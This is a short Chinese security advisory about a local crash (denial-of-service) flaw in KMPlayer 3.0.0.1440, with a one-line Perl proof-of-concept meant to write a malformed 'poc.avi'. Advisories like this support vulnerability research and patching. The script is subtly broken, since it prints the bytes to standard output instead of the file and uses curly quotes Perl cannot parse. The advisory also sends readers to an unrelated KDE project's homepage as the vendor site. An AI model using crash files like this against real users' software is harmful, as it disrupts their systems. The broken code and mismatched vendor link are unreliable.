KMPlayer ‘.avi’文件本地拒绝服务漏洞

受影响系统:
KMPlayer KMPlayer 3.0.0.1440
描述:
BUGTRAQ ID: 56322

KMPlayer是来自韩国的影音全能播放器,是从linux平台移植而来的,几乎可以播放您系统上所有的影音文件。

KMPlayer 3.0.0.1440及其他版本存在安全漏洞,本地攻击者可利用此漏洞使受影响应用崩溃。

<*来源:Am!r *>

测试方法:
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
#Title : KmPlayer v3.0.0.1440 Local Crash PoC
#Discovered By : Am!r
#Home : http://IrIsT.Ir/forum/
#tested : XP
#TNX : Alireza , C0dex , B3hz4d

my $po=”\x46\x02\x00\x00″;

open(C, “>:raw”, “poc.avi”);

print $po;

close(C);

建议:
厂商补丁:

KMPlayer
——–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://kmplayer.kde.org/

评论关闭。